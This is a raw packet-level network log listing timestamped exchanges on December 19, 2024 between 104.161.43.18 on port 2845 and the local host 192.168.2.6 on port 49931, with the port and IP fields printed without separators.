                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.370342970 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.370470047 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.370538950 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.372410059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.372510910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.372718096 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.374450922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.374603033 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.374718904 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.376513958 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.376636028 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.376708984 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.378640890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.378830910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.379005909 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.380579948 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.380692959 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.380744934 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.382625103 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.382766962 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.382874012 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.384677887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.384826899 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.384942055 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.386733055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.386858940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.386943102 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.388854980 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.388998985 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.389100075 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.390822887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.390893936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.391031981 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.392858028 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.393007994 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.393068075 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.394892931 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.395008087 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.395070076 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.396967888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.397103071 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.397207022 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.399008989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.399111032 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.399233103 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.401047945 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.401232004 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.401297092 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.403112888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.403233051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.403332949 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.405160904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.405266047 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.405332088 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.407224894 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.407345057 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.407444000 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.409233093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.409420967 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.409475088 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.411274910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.411415100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.411479950 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.413364887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.413435936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.413537979 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.415400982 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.415529966 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.415590048 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.417524099 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.417599916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.417660952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.419476032 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.419573069 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.419644117 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.421525955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.421636105 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.421739101 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.423554897 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.423707962 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.423780918 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.425601959 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.425685883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.425812006 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.427669048 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.427773952 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.427819014 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.429691076 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.429744005 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.429811954 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.431757927 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.431931019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.432022095 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.433756113 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.433856010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.433898926 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.521639109 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.521704912 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.521853924 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.522041082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.522274017 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.522495031 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.523541927 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.523595095 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.523639917 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.524914980 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.525026083 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.525104046 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.526501894 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.526617050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.526667118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.528084040 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.528170109 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.528367996 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.529632092 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.529721022 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.529839039 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.531214952 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.531296968 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.531368017 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.532726049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.532790899 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.533358097 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.534245968 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.534400940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.534460068 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.535701036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.535753012 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.537189007 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.537244081 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.537323952 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.537405968 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.538676977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.538768053 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.538911104 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.540237904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.540359974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.540412903 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.541676044 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.541785955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.541891098 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.543103933 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.543205023 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.543275118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.544409990 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.544730902 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.544797897 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.545809984 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.545995951 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.546545982 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.547338963 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.547373056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.547446012 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.548639059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.548707962 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.548800945 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.549988031 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.550108910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.550187111 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.551366091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.551402092 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.551542997 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.552751064 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.552865028 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.553052902 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.554076910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.554200888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.554363012 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.555567026 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.555708885 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.555773973 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.556740046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.556900978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.556948900 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.558027983 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.558173895 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.558212996 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.559370995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.559503078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.559555054 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.560688972 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.560837984 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.560883045 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.562061071 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.562148094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.562212944 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.563385963 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.563504934 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.563596964 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.564708948 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.564958096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.565013885 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.566019058 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.566142082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.566286087 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.567327023 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.567460060 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.567621946 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.568627119 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.568778038 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.568837881 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.570117950 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.570513964 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.570899010 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.571306944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.571846962 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.571979046 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.572727919 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.572916031 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.573020935 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.574018002 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.574163914 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.574635029 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.575341940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.575442076 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.575504065 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.576623917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.576749086 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.576828957 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.578020096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.578035116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.578099966 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.579271078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.579437017 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.579557896 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.580584049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.580670118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.580771923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.581887007 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.582094908 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.582278013 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.583389997 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.583517075 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.583985090 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.584655046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.584734917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.585014105 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.585932016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.586052895 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.586231947 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.587577105 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.587869883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.587949038 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.588778019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.588835955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.588956118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.589999914 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.590018034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.590078115 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.591142893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.591286898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.591339111 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.592581034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.592669010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.592741013 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.593981981 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.633567095 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.713582993 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.713732004 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.713781118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.714014053 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.714114904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.714282990 CET499312845192.168.2.6104.161.43.18
